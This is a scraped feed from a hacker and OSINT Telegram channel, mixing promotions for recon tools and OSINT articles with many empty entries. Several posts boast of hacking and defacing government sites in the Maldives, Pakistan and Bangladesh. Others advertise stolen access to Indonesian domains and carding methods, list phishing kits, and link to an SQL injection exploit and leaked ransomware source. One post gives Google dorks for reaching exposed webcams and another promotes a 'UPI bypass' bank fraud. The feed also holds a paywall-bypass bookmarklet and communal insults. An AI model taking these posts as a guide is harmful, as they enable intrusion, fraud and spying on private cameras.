𝙏𝙝𝙚 𝙈𝙤𝙨𝙩 𝘼𝙙𝙫. 𝘿𝙤𝙢𝙖𝙞𝙣 𝙀𝙣𝙪𝙢𝙚𝙧𝙖𝙩𝙞𝙤𝙣 𝙏𝙤𝙤𝙡 😱🔥𝙏𝙤𝙤𝙡 𝙗𝙮: Sanjai Kumar𝗧𝗼𝗽𝗶𝗰 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭.Efficiency Test with other Tools. ⚡𝟮.Configuring with API Keys🔑𝟯. Notifying the Domain Enumeration 🔔𝙒𝙖𝙩𝙘𝙝 𝙉𝙤𝙬, 𝙩𝙤 𝙜𝙚𝙩 𝙢𝙤𝙧𝙚 𝙏𝙖𝙧𝙜𝙚𝙩𝙨🤑👇🏻𝙇𝙞𝙣𝙠: https://youtu.be/lWPukbNMl70?si=k6_j6byPCrZDG8Zc𝗣𝗹𝗲𝗮𝘀𝗲 𝗟𝗶𝗸𝗲 & 𝗦𝘂𝗯𝘀𝗰𝗿𝗶𝗯𝗲 𝘁𝗼 𝗼𝘂𝗿 𝗬𝗼𝘂𝗧𝘂𝗯𝗲 𝗰𝗵𝗮𝗻𝗻𝗲𝗹☺️
2024-01-15 01:45:44
None
2024-01-14 15:21:50
None
2024-01-14 11:55:36
Hoara Online | News, Politics, Stories of Maldivesthreat actor: M4D_GH057 (REXX)https://hoara.mv/https://mirror-h.org/zone/5575047/Supp!! Maldives#Indianhackers >> Team DemonSec Images
2024-01-14 06:30:59
None
2024-01-14 04:58:46
ANYONE WITH CRACKED CPANEL OR DOMAIN ACCOUNTS WITH DOMAIN LINKED ? TAKEAWSNEW DOMAINS HOSTING VPS RDPKEYS SOFTWARESADYEN METH STRIPE METHCHECKOUT METHDM @CATH3R
2024-01-14 03:01:29
None
2024-01-13 07:57:42
Hello Guys wait is over and new version of Subdominator is released which is now better than previous versions and other tools now you can update or install the Subdominator's latest version and find the secret domains which are in dept by using subdominator for more information you can visit: https://github.com/sanjai-AK47/Subdominator
2024-01-13 07:42:36
Sync Contacts: A un-noticed goldmine of OSINThttps://publication.osintambition.org/sync-contacts-a-un-noticed-goldmine-of-osint-8159c3d89c4cJoin @osintambition for more.#osint #opsec #infosec #cybersec #privacy #synccontacts #phoneosint
2024-01-13 04:02:42
None
2024-01-13 02:43:19
None
2024-01-12 13:42:24
None
2024-01-12 11:07:38
https://youtu.be/_4pLtdxUBQ4250+ Views 😍🙏🏻
2024-01-12 06:23:23
None
2024-01-12 03:21:22
[2024] Share Market Fundamentals: Beginner’s Guide in Hindi![Hindi + English]Basic Knowledge in the Share Market: Guiding Beginners + Intermediates Enroll Now as Soon as Possible. It's Limited for certain time. Images
2024-01-11 19:04:18
Please all Use this dp on your profile Images
2024-01-11 12:23:37
None
2024-01-11 12:21:12
☑️ TOP 10 PHISHING TOOLS TO USE IN 2024 Setoolkit - https://github.com/trustedsec/social-engineer-toolkitSocialFish - https://github.com/UndeadSec/SocialFishHiddenEye - https://github.com/DarkSecDevelopers/HiddenEye-LegacyEvilginx2 - https://github.com/kgretzky/evilginxSeeYou - (Get Location using phishing attack) - https://github.com/Viralmaniar/I-See-YouSayCheese - (Grab target's Webcam Shots) - https://github.com/hangetzzu/saycheeseQR Code Jacking - https://github.com/cryptedwolf/ohmyqrShellPhish - https://github.com/An0nUD4Y/shellphishBlackPhish - https://github.com/iinc0gnit0/BlackPhish➡️ Give Reactions for More Such Content 🤟
2024-01-11 06:24:57
New Article in OSINT Ambition Publication2 ways to find the full email of a place on Google MapsOne more amazing writeup by @cybdetectivehttps://publication.osintambition.org/2-ways-to-find-the-full-email-of-a-place-on-google-maps-b441458bb467Join @osintambition for more. #osint #opsec #infosec #cybersec #geoint #privacy #Geolocation #AI
2024-01-11 05:26:50
𝗧𝗶𝗺𝗲 𝗯𝗮𝘀𝗲𝗱 𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗢𝗻𝗲𝗹𝗶𝗻𝗲𝗿😍𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1745315492775206916?t=oDRYhmHGD4YkEYDCJdrGBw&s=19
2024-01-11 03:18:03
None
2024-01-11 00:28:54
🔥 Maldives Business Times Official Website Hacked By Team UCC 🔥✅🇲🇻 SITE :- https://mbt.mv/✅🇲🇻 POC :- https://ownzyou.com/zone/198537This is Just A Demo Of Our Attacks We Can Do More Better If Your Government Wants 👾 !!#WeAreIndiansHackers #TEAM_ANON_101 #TEAM_UCC #TEAM_ICP #AnonymousIndia #UnknownCyberCult #Indian_Cyber_Punk #TeamNwh #All_Indian_Hackers #Network_Nine #Black_Dragon_Sec #DarkCyberWarrior #GlorySec⚜️♤ @UCC_TEAM ♤⚜️
2024-01-10 13:07:29
Anyone Know Any Cybersecurity Related Webui Panel Based Tools Plz Drop In my dm @mynk0x00 I will host it on system32.in on vps
2024-01-10 07:43:41
𝐂𝐘𝐁𝐄𝐑 𝐒𝐄𝐂𝐔𝐑𝐈𝐓𝐘 𝐎𝐏𝐄𝐍 𝐒𝐎𝐔𝐑𝐂𝐄 𝐓𝐎𝐎𝐋𝐒🎯 1. Zeek: https://zeek.org/ Network Security Monitoring 🎯 2. ClamAV: https://www.clamav.net/ Antivirus 🎯 3. OpenVAS: https://www.openvas.org/ Vulnerability Scanner 🎯 4. TheHive: https://lnkd.in/e7aVCRUZ Incident Response 🎯 5. PFSense: https://www.pfsense.org/ Security appliance (firewall/VPN/router) 🎯 6. Elastic: https://www.elastic.co/de/ Analytics 🎯 7. Osquery: https://www.osquery.io/ Endpoint visibility 🎯 8. Arkime: https://arkime.com/ Packet capture and search 🎯 9. Wazuh: https://wazuh.com/ XDR and SIEM 🎯 10. Alien Vault Ossim: https://lnkd.in/eShQt29h SIEM 🎯 11. Velociraptor: https://lnkd.in/eYehEaNa Forensic and IR 🎯 12. MISP project: https://lnkd.in/emaSrT57 Information sharing and Threat Intelligence 🎯 13. Kali: https://www.kali.org/ Security OS 🎯 14. Parrot: https://www.parrotsec.org/ Security OS 🎯 15. OpenIAM: https://www.openiam.com/ IAM 🎯 16. Yara: https://lnkd.in/eEJegEak Patterns 🎯 17. Wireguard: https://www.wireguard.com/ VPN 🎯 18. OSSEC: https://www.ossec.net/ HIDS 🎯 19. Suricata: https://suricata.io/ IDS/IPS 🎯 20. Shuffler: https://shuffler.io/ SOAR 🎯 21. Phish Report: https://phish.report/ Anti Phishing 🎯 22. Graylog: https://lnkd.in/eAFuUmuw Logmanagement 🎯 23. Trivy: https://lnkd.in/e7JxXStY DevOps/IaC Scanning 🎯 24. OpenEDR: https://openedr.com/ EDR 🎯 25. Metasploit: https://lnkd.in/e4ECX-py Pentest 🎯 26. NMAP: https://nmap.org/ Old but gold Credits: Seyed Arshia Ahmadi #cybersecurity #cybersecuritytools #opensource
2024-01-10 07:12:05
INFORMATION DISCLOSURE AT NASA : HERE
2024-01-10 05:50:12
𝗣𝗿𝗶𝘃𝗶𝗹𝗲𝗴𝗲 𝗘𝘀𝗰𝗮𝗹𝗮𝘁𝗶𝗼𝗻 𝗶𝗻 𝗧𝗲𝗹𝗲𝗽𝗼𝗿𝘁. 𝗕𝗼𝘂𝗻𝘁𝘆 : $ 𝟮𝟭,𝟬𝟬𝟬 😱𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖 👇🏻:https://youtu.be/i_vbEXmhxFU?si=E-mkMIbH_1_vLxmT
2024-01-10 05:10:36
None
2024-01-10 04:59:48
None
2024-01-10 00:58:53
None Images
2024-01-10 00:58:14
🚨 Maldives Government Court site has been H@CKeD bY TEAM-NETWORK-NINE 🚨⚠️ SITE : https://juvenilecourt.gov.mv/⚠️ POC : web.archive.orgGreets All Indian Hackers Images
2024-01-10 00:55:19
None
2024-01-09 14:51:09
Sync Contacts: A un-noticed goldmine of OSINThttps://www.osintambition.org/synccontacts-a-unnoticed-goldmine-of-osint/One of the most awaited blog is published now. As a thank you to my local website members, will be publishing this blog on medium after 15days.Share it with your friends and family.Join @osintambition for more.#osint #opsec #infosec #cybersec #privacy #synccontacts #phoneosint
2024-01-09 13:47:04
If you Need TryHackMe Voucher At a Cheapest Rate in the Whole Telegram Market Then Dope Me...✅1 Month Voucher = 3.5$ & 250₹Payment Method 🤩BTC💸, USDt💸, UPI 🌐Dm 👼@lexlegion👼Only 2 Stock Remains for Today...Grab Your Oppertunity Fast📍 Images
2024-01-09 10:08:19
Can we hit 500 today? Subscribe to the channel if you haven't done it yet. https://youtube.com/@OSINTAMBITIONShare it with your friends And family. Let me in know topic if you want any special video on any special topic in comments. Join @osintambition for more. Images
2024-01-09 08:32:41
None Images
2024-01-09 06:59:45
None
2024-01-09 05:19:32
None
2024-01-09 03:35:39
New Article in OSINT Ambition PublicationA 1-minute way to geolocate road signs that show the distance to the nearest cities One more amazing writeup by @cybdetectivehttps://medium.com/osint-ambition/a-1-minute-way-to-geolocate-road-signs-that-show-the-distance-to-the-nearest-cities-9e8d4d08b93bFollow @osintambition for more. #osint #opsec #infosec #cybersec #geoint #privacy #Geolocation #AI
2024-01-08 15:52:38
https://www.linkedin.com/posts/shashankmaurya_nasa-bugbounty-halloffame-activity-7150151229027868677-R6RX?utm_source=share&utm_medium=member_androidShow Love & Support Brother's On LinkedIn ❤️
2024-01-08 14:02:29
None
2024-01-08 10:24:54
None
2024-01-08 09:06:58
https://system32.ink/semcms-v4.8-cve-2023-48864-sql-injection-exploit/Semcms v4.8 CVE-2023-48864 SQL Injection Exploit
2024-01-08 07:53:09
Boom Boom Maldives 🌘
2024-01-08 06:06:21
https://medium.com/@maisamnoyan/tryhackme-labs-to-prepare-for-the-ejpt-exam-33fa0efd0cbe
2024-01-08 05:30:03
CrackCodes 🇮🇳 pinned «»
2024-01-08 05:05:48
𝘼𝙪𝙩𝙤𝙢𝙖𝙩𝙞𝙣𝙜 𝘾𝙍𝙇𝙁 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣𝙏𝙤𝙥𝙞𝙘𝙨 𝙘𝙤𝙫𝙚𝙧𝙚𝙙:𝟭.What is CRLF & How it works🤔𝟮. How to find CRLF Injection Bugs 🧐𝟯. Automating CRLF Vulnerability for Bug Bounty🤑𝗪𝗮𝘁𝗰𝗵 𝗡𝗼𝘄 👇🏻😋https://youtu.be/_4pLtdxUBQ4?si=mFJMjACf6Ru9uo1j
2024-01-08 04:54:56
Top 7 Websites to check if your data has been leaked online | Breach Data | Email OSINThttps://youtu.be/Ef6J0haava8#osint #privacy #security #infosec #cybersec #opsec#email #emailosintLike, share and subscribe.Join @osintambition for more.
2024-01-08 04:28:36
None
2024-01-08 03:51:34
IMPORTANT ANNOUNCEMENT We have recieved a lot of good response as of now. 73people want to read blogs from our website and 50people voted for medium blog.https://www.osintambition.org/If we hit 100members on our website, then we will continue running it and a lot of awesome content will be published soon.Right now, it's 43members, so subscribe to the website by registering via your email so that you can directly all new post in your inbox.If we didn't hit target of 100 in next 4days, we will shut down the website as of now. All our blogs will be available on medium, so you can always read them from their.Apart from that, we have discontinued the 30DaysOfOSINT, and will post content from now onwards anytime. https://www.osintambition.org/Thanks for showing so much love to OSINT Ambition.@osintambition
2024-01-08 03:40:07
None
2024-01-07 14:47:01
None
2024-01-07 14:19:11
https://system32.ink/hellokitty-ransomware-source-code-download/
2024-01-07 05:50:44
None
2024-01-07 04:28:12
New Article in OSINT Ambition Publication How to geolocate public transport photo using OverPass Turbo and AIOne more amazing writeup by @cybdetective https://publication.osintambition.org/geospy-openstreetmap-search-super-power-a5c0a4028cdcFollow @osintambition for more. #osint #opsec #infosec #cybersec #geoint #privacy #AI #Geolocation
2024-01-07 03:02:14
Marcos went, Marcos did what they do best, Marcos got out..
2024-01-07 03:00:14
Indian Navy's Mission Deployed platforms responded swiftly to a maritime incident in Arabian Sea involving a hijacking attempt onboard a Liberia-flagged bulk carrier. The vessel had sent a message on UKMTO portal indicating boarding by approx five to six unknown armed personnel in the evening on 04 Jan 24: Indian NavyMarcos 🔥
2024-01-06 14:33:27
New Article in OSINT Ambition Publication GeoSpy + OpenStreetMap search = super powerAn amazing writeup by @cybdetective https://publication.osintambition.org/geospy-openstreetmap-search-super-power-a5c0a4028cdcFollow @osintambition for more. #osint #opsec #infosec #cybersec #geoint #privacy #AI #Geolocation
2024-01-06 12:28:53
BANGLADESH 💉NATIONAL API ALONG WITH NATIONAL DATABASE CREDENTIALS HACKED ☠️NOTE:- THIS API IS INTEGRATED IN YOUR ALL GOV WEBSITE APPROX 3000 TEAM-NETWORK-NINEThreat Actor: P10n3Greetings to#Team ucc#Team Network Nine#Team BlackDragonsec#Team NWH Security#KERALA CYBER BLACK SQUAD#Kerala Cyber Xtractors#indiancybermafia Images
2024-01-06 12:11:54
None
2024-01-06 11:36:13
None Images
2024-01-06 11:12:41
Lahore PAKISTAN power grid Hacked By TEAM-NETWORK-NINE Threat Actor: P10n3Greetings to#Team ucc#Team Network Nine#Team BlackDragonsec#Team NWH Security#KERALA CYBER BLACK SQUAD#Kerala Cyber Xtractors#indiancybermafiaFor truly this reality…is a hell Images Images Images Images
2024-01-06 05:28:31
None
2024-01-06 02:42:12
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-01-05 23:57:25
None
2024-01-05 15:56:44
🟥A TO Z ABOUT XSSOverview:-Cross-Site Scripting (XSS) attack are a type of injection,in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.An attacker can use XSS to send a malicious script to an unsuspecting user. ➡️ Give Reactions 🤟
2024-01-05 10:09:27
None
2024-01-05 08:39:25
None
2024-01-05 05:51:13
CrackCodes 🇮🇳 pinned a video
2024-01-05 05:50:53
Achievements of DRDO in 2023..
2024-01-05 04:55:37
None
2024-01-04 15:38:36
None
2024-01-04 07:39:00
None
2024-01-04 05:53:46
None
2024-01-03 16:59:36
i just won a chess game with a pakistani guy@pkmc on top ✨ ( Baap Baap Hota Hai Images
2024-01-03 15:38:37
link https://t.me/+FcBQD3Lpl-40N2Y1vote link https://t.me/c/2131931711/2580JOIN KRK HACKLOCK KO VOTE KRO SBHI BHAILOG
2024-01-03 15:31:02
None
2024-01-03 15:10:27
Top 10 OSINT Tools to Learn | The Top10 Serieshttps://osintambition.substack.com/p/top-10-osint-tools-to-learn-the-top10#osint #infosec #cybersec #top10series #opsec Join @osintambition for more.
2024-01-03 13:04:04
None
2024-01-03 08:38:24
ANY VIDEO EDITOR? DM @CYBERDIN
2024-01-03 05:08:57
None
2024-01-02 18:29:01
None
2024-01-02 14:29:39
None
2024-01-02 11:40:42
Top 10 Books for Learning OSINThttps://osintambition.substack.com/p/top-10-books-for-learning-osint#osint #infosec #cybersec #top10series #opsec Join @osintambition for more.
2024-01-02 08:52:48
🇵🇰 #PIA has confirmed that 14 aircraft out of 29 have been grounded due to non availability of funds.What's happening to this great Shitlamic nation 🇵🇰😂 Images
2024-01-02 06:56:10
2 month linkedin premium guaranteed premium offer dm @protocolnick for cheap price The only requirement is that you have a debit or credit card for just verification purposes nothing else.Interested dm me fast limited stocks available click here to msg me
2024-01-02 05:58:37
𝗟𝗲𝗮𝗿𝗻𝗕𝘂𝗿𝗽𝘀𝘂𝗶𝘁𝗲 𝗕𝗮𝗺𝗱𝗮 🔥😍𝗟𝗶𝗻𝗸: https://youtu.be/-EPQwO7xunQ?si=A3TDQHt34rJCq9FJMake sure your Like & Subscribe to our YouTube Channel☺️✨
2024-01-02 05:45:26
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-01-02 05:25:18
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅ TRUSTED💰100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS
2024-01-02 03:41:08
None
2024-01-02 03:18:23
None
2024-01-01 15:16:42
None
2024-01-01 14:36:19
Any Data Forensic Expert Here If Yes Plz comment down, I Need Some Help
2024-01-01 08:12:58
TRYHACKME PREMIUM AVAILABLE ( PAID )DM @CYBERDIN IF YOU NEED✅TRUSTED💰100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS
2024-01-01 07:37:24
None
2024-01-01 03:58:38
None
2023-12-31 18:55:26
🎉 Happy New Year 2024! 🎊May this year be filled with joy, success, and endless opportunities! 🌟✨ Wishing everyone a year full of love, laughter, and good health. Images
2023-12-31 15:32:32
Happy customer 😍100% Trusted 💰Money back guarantee If you want to buy THM voucher just dm @CYBERDIN Images Images
2023-12-31 12:42:42
👍 SELL 69K Indonesia Access 🔐 ⚡️⚡️⚡️⚡️⚡️💰 800$☑ 50% discount for all products✅ ⚡️⚡️⚡️⚡️⚡️🌐domain list:.mil.id🥳77.go.id🥳 31960.ac.id🥳10819.co.id🥳12264✅ Payment : BTC🪙, ETH🔷,USDT🪙🔹🔹🔹✅ @Hajit00n Images Images
2023-12-31 11:57:08
New Blog in OSINT Ambition PublicationHow to find unprotected databases with Netlas.io?https://publication.osintambition.org/how-to-find-unprotected-databases-with-netlas-io-2bf186e9fc2dJoin @osintambition for more.#osint #cybersec #infosec #cybersecurity #database #dorking #pentest #bugbounty #penetrationtesting
2023-12-31 10:51:52
PURCHASE HISTORY GMAIL NEEDED COME FAST :@LuciferStar_2023
2023-12-31 10:19:00
https://t.me/+Au4zZpQ5jexlYThlJoin VC Fast
2023-12-31 09:55:07
None
2023-12-31 05:14:40
None
2023-12-30 18:07:57
How to Read Medium's Members Only Article for Free1. Open Chrome and Create New Bookmark2. Name Bookmark Anything you want3. In url section Add Code Provided Below 👇javascript:(function(){ if(window.location.hostname == "medium.com"){ window.location.href = `https://medium-free.vercel.app/read?url=${window.location.href}`; }else{ alert("Please make sure you're onto medium.com post/article.") }})();4. Go to the Article5. Click on Adress Bar and search for name you saved bookmark with.6. You'll be redirected to new page where you can read for freeBy:- @geek_hkr
2023-12-30 12:09:38
CrackCodes 🇮🇳 pinned «»
2023-12-30 12:07:07
Support for Balochistan freedom is rising .. Pak Army is doing a genocide in Balochistan You don't have to be a Baloch to stand and support the people of Balochistan.You just need to be a HUMAN like her.Baloch Are Humans and #BalochLivesMatter Too.#UnitedForBalochistan
2023-12-30 06:06:31
None
2023-12-30 05:03:20
None
2023-12-29 12:39:29
None
2023-12-29 09:42:54
CrackCodes 🇮🇳 pinned «»
2023-12-29 07:53:21
None
2023-12-29 06:25:41
🚨 Telegram Search Enginesxtea.io/ts_en.htmltelemetryapp.iohttps://cse.google.com/cse?q=+&cx=006368593537057042503:efxu7xprihg (Telegago)lyzem.com/tgstat.com/en/searchtgdev.io/tme/➡️ Give Reactions 🤟 Images
2023-12-29 06:19:40
TRYHACKME PREMIUM AVAILABLE ( PAID )DM @CYBERDIN IF YOU NEED✅TRUSTED💰100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS
2023-12-29 02:49:22
None
2023-12-28 18:31:04
None
2023-12-28 14:55:38
https://www.youtube.com/live/imrcd1oBuDM?si=hqe1qWDpkWcy1sCF
2023-12-28 14:25:43
We are now live on Youtube for QnA.https://www.youtube.com/watch?v=imrcd1oBuDMJoin us asap. We will begin after 5min.
2023-12-28 07:30:55
None
2023-12-28 06:31:21
None
2023-12-28 05:52:53
Subscribe to our newsletter on Substack https://osintambition.substack.com/Will be dropping some really amazing issues on this new year.Don't miss the chance, subscribe now.Join @osintambition for more.
2023-12-28 05:04:41
𝗕𝘂𝗴: Brute forcing App PIN𝗕𝗼𝘂𝗻𝘁𝘆: 𝟭𝟬𝟬 $🤑𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖: https://youtu.be/TAE-Alh5M34?si=jevQoK2JWTex5iop
2023-12-27 23:50:33
None
2023-12-27 20:18:03
Digital forensics Tools Site Collection :- 1. Autopsy: https://autopsy.com 2. EnCase: https://lnkd.in/dRwh9VwZ 3. AccessData Forensic Toolkit (FTK): https://lnkd.in/dwhkAFKt 4. X-Ways Forensics: https://x-ways.net 5. Sleuth Kit: https://sleuthkit.org 6. Volatility: https://lnkd.in/dXX7-Vwc 7. Wireshark: https://wireshark.org 8. Cellebrite UFED: https://lnkd.in/dqm7x8cs 9. Forensic Email Collector: https://lnkd.in/dc-MeV7b 10. Digital Forensics Framework (DFF): https://lnkd.in/dmzfPdSa 11. Magnet AXIOM: https://lnkd.in/daQVh6nu 12. Oxygen Forensic Detective: https://lnkd.in/dAMRE7MQ 13. OSForensics: https://lnkd.in/dGmC8ZYC 14. NetworkMiner: https://lnkd.in/dF5S8tmM 15. RegRipper: https://lnkd.in/d2Katt9M 16. Bulk Extractor: https://lnkd.in/dA4_KWke 17. Ghiro: https://lnkd.in/dtaC3zbq 18. Scalpel: https://lnkd.in/dcauiS8p 19. HxD: https://lnkd.in/ddZC5tSJ 20. TestDisk: https://lnkd.in/dzbwsMQU 21. PhotoRec: https://lnkd.in/dCG9pKRs 22. CAINE (Computer Aided INvestigative Environment): https://lnkd.in/deNCZe9J 23. Axiom Cyber: https://lnkd.in/dVnkMpDn 24. Belkasoft Evidence Center: https://belkasoft.com/ec 25. Fibratus: https://lnkd.in/dhvrGykB 26. Autopsy Browser: https://autopsy.com 27. Kali Linux: https://kali.org 28. DEFT (Digital Evidence & Forensic Toolkit): http://deftlinux.net 29. Volatility Framework: https://lnkd.in/dXX7-Vwc 30. PyFlag: https://lnkd.in/dfMVnnPJ 31. Plaso (log2timeline): https://lnkd.in/dDwJvrEy 32. TSK (The Sleuth Kit): https://lnkd.in/d9rCryMN 33. Redline: https://lnkd.in/dqfpFzz7 34. Snort: https://snort.org 35. Tcpdump: https://tcpdump.org 36. Ngrep: https://lnkd.in/dagkZm-r 37. dcfldd: https://lnkd.in/dPm5Hha2 38. Wireshark: https://wireshark.org 39. SIFT (SANS Investigative Forensic Toolkit): https://lnkd.in/dc7b3vvU 40. Paladin: https://lnkd.in/dyK6iXCj 41. CAINE Live: http://caine-live.net 42. XRY (XAMN): https://lnkd.in/dv5c_Wmi 43. BlackLight: https://lnkd.in/dMxsBbEi 44. WinHex: https://lnkd.in/dS7vJn-c 45. AccessData FTK Imager: https://lnkd.in/dzFdb-bv 46. DC3DD: https://lnkd.in/dKwBPyP4 47. Raptor: https://lnkd.in/dq8hHget 48. EnCase Imager: https://lnkd.in/dRwh9VwZ 49. Guymager: https://lnkd.in/dHKMxxFY 50. Scalpel: https://lnkd.in/dcauiS8pShared by : @cybertrickzone
2023-12-27 17:23:34
Live QnA Announcement Tomorrow evening, at 8PM IST, we will be going live on our youtuber channel. You all can freely ask all your doubts and queries during the live session.If you have any questions in mind, comment below this post and I will cover those in live and you can ask on the spot question.https://youtube.com/live/imrcd1oBuDM?feature=shareJoin @osintambition for more.
2023-12-27 15:31:05
None
2023-12-27 11:49:12
None
2023-12-26 22:41:01
👽How to HACK INTO RANDOM PEOPLE'S CAMERAS IN MINUTES! 👽1. Go on google.2. Write one or a combination of two of these Strings:inurl:/views.shtmlinurl:ViewerFrame?Mode=inurl:ViewerFrame?Mode=Refreshinurl:axis-cgi/jpginurl:view/views.shtmlliveappletintitle:"live view" intitle:axisintitle:liveappletintitle:axis intitle:"video server"intitle:"EvoCam" inurl:"webcam.html"inurl:indexFrame-shtml Axisintitle:start inurl:cgistartintitle:snc-z20 inurl:home/intitle:snc-cs3 inurl:home/intitle:snc-rz30 inurl:home/viewnetcam.comintitle"Toshiba Network Camera" user loginintitle"i-Catcher Console - Web Monitor"3. Search for a result which looks "weird" (without any information under the main title and/or with an IP address as a main title)Disclaimer : Don’t try to access a password protected camera or you might get into real trouble . Doing Hacking is punishable under Law and we hold no responsibility of what you do with this information . Purely for Educational Purposes.Shared by @cybertrickzone--please share with credits only--
2023-12-26 17:59:30
TRYHACKME PREMIUM AVAILABLE ( PAID )DM @CYBERDIN IF YOU NEED
2023-12-26 08:38:53
None
2023-12-26 07:07:49
None
2023-12-25 20:01:16
For Subdomain-Enumeration, you run many tools every time.But not anymore. Try this website for Subdomain-Enumeration. 👇🤯shrewdeye.app Images
2023-12-25 13:43:57
🥳𝗛𝗮𝗽𝗽𝘆 𝘁𝗼 𝗔𝗻𝗻𝗼𝘂𝗻𝗰𝗲🥳𝗪𝗲 𝗵𝗮𝘃𝗲 𝗔𝗰𝗵𝗶𝗲𝘃𝗲𝗱 𝟮𝗸 +😍 𝗦𝘂𝗯𝘀𝗰𝗿𝗶𝗯𝗲𝗿𝘀. 𝗥𝗲𝗮𝗹𝗹𝘆 𝗧𝗵𝗮𝗻𝗸 𝘆𝗼𝘂 𝘀𝗼 𝗺𝘂𝗰𝗵 𝗘𝘃𝗲𝗿𝘆𝗼𝗻𝗲 𝗳𝗼𝗿 𝘆𝗼𝘂𝗿 𝗦𝘂𝗽𝗽𝗼𝗿𝘁🙏🏻☺️✨𝗞𝗲𝗲𝗽 𝘀𝘂𝗽𝗽𝗼𝗿𝘁𝗶𝗻𝗴 𝘂𝘀 𝗹𝗶𝗸𝗲 𝘁𝗵𝗶𝘀, 𝗳𝗼𝗿 𝗠𝗼𝗿𝗲 𝗕𝘂𝗴 𝗕𝗼𝘂𝗻𝘁𝘆 𝗩𝗶𝗱𝗲𝗼𝘀, 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 𝗘𝘅𝗽𝗹𝗮𝗻𝗮𝘁𝗶𝗼𝗻 & many more... 𝗜𝗳 𝘆𝗼𝘂 𝗮𝗿𝗲 𝗡𝗲𝘄, 𝗖𝗵𝗲𝗰𝗸 𝗼𝘂𝘁 𝗼𝘂𝗿 𝗬𝗼𝘂𝗧𝘂𝗯𝗲 𝗰𝗵𝗮𝗻𝗻𝗲𝗹🙏🏻𝗟𝗶𝗻𝗸: https://youtube.com/@cybertix Images
2023-12-25 12:27:25
This new Email OSINT tools is amazing | OSINT Industries Alternativehttps://youtu.be/qDRyDmWjDeU Show some love on this video.Like, share and subscribe. Join @osintambition for more.#osint #opsec #emailosint #phonenumberosint #privacy #security #socmint
2023-12-25 12:23:09
🤯𝘾𝘼𝙎𝙃𝙊𝙐𝙏 𝙊𝙁 𝙑𝙄𝘾𝙏𝙄𝙈𝙎 🤯🥶WHAT IS UPI BYPASS ?🥶HOW IT IS DONE ?🥶WHAT IS BANK ACCOUNT HACKING?ALL CONTENT AND EXPOSE OF UPI BYPASS IS POSTED 👺It is not a promo 👹https://t.me/+M6YyQ5BDauVlODQ1https://t.me/+M6YyQ5BDauVlODQ1https://t.me/+M6YyQ5BDauVlODQ1https://t.me/+M6YyQ5BDauVlODQ1☠JOIN TO SEEE WHOLE METHOD AND PRECAUTIONS 💀 Images
2023-12-25 11:28:47
None
2023-12-25 08:33:09
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟮𝟰𝗠𝗼𝗯𝗶𝗹𝗲 𝗙𝗼𝗿𝗲𝗻𝘀𝗶𝗰𝘀 😍🔥𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/BxiCCMC5Ud8?si=3pWLFjYY8aQK23rM
2023-12-25 07:47:37
🎯DeltaClause Is Hiring for Interns in Bulk (Limited Slots Available)Degree:- Any GraduateBatch:- 2018, 2019, 2020, 2021, 2022, 2023,2024, 2025, 2026Apply @ https://www.sarkaripareekshabhavan.in/2023/12/deltaclause-is-hiring-for-internship.htmlCyber security & ethical hacking , digital forensics internship also available.Join WhatsApp:- https://lnkd.in/gXxDSA9Z
2023-12-25 05:19:24
💐तुलसी पूजन दिवस की हार्दिक शुभकामनाएं💐 Images
2023-12-25 02:05:19
None
2023-12-24 13:19:36
None
2023-12-24 10:13:40
None
2023-12-23 23:39:30
Hey Hunters , Penetration Testers and Ethical hackers, Im introducing my new tool which will improve you recon process and spread your attack vectors, finding virtual hosts and exploring unknown directories and files in web page by directory Fuzzings,Probuster is designed with several modes to find virtual host, Directory/File fuzzings, dns enumerationsProbuster modes are:vhost : Virtual host enumerationsdir : Directory/Files enumerationdns : Dns enumerations doc : Show probuster documentations and usage though web basedProbuster documenation modules is special module that shows the whole docs of probuster through a web page on local hostProbuster is builded with platform independent and super concurrency which bypasses GIL of python which limits the threadsto know more and use it visit here: https://github.com/sanjai-AK47/Probuster
2023-12-23 15:30:29
None
2023-12-23 12:51:33
None
2023-12-23 07:52:23
JOIN : https://t.me/exmuslim12 Images
2023-12-23 03:30:23
None
2023-12-23 03:10:10
ANY VIDEO EDITOR UP ? DM ME @CYBERDIN
2023-12-23 00:59:57
Join This channel it provide free Courses And Resources https://t.me/+f3C4TFRF3CFhZjBlhttps://t.me/+f3C4TFRF3CFhZjBlhttps://t.me/+f3C4TFRF3CFhZjBl Images
2023-12-22 17:45:14
Shared by @cybertrickzone
2023-12-22 15:41:06
https://shahnishant.com.np/get-paid-udemy-courses-for-free/
2023-12-22 12:07:18
None
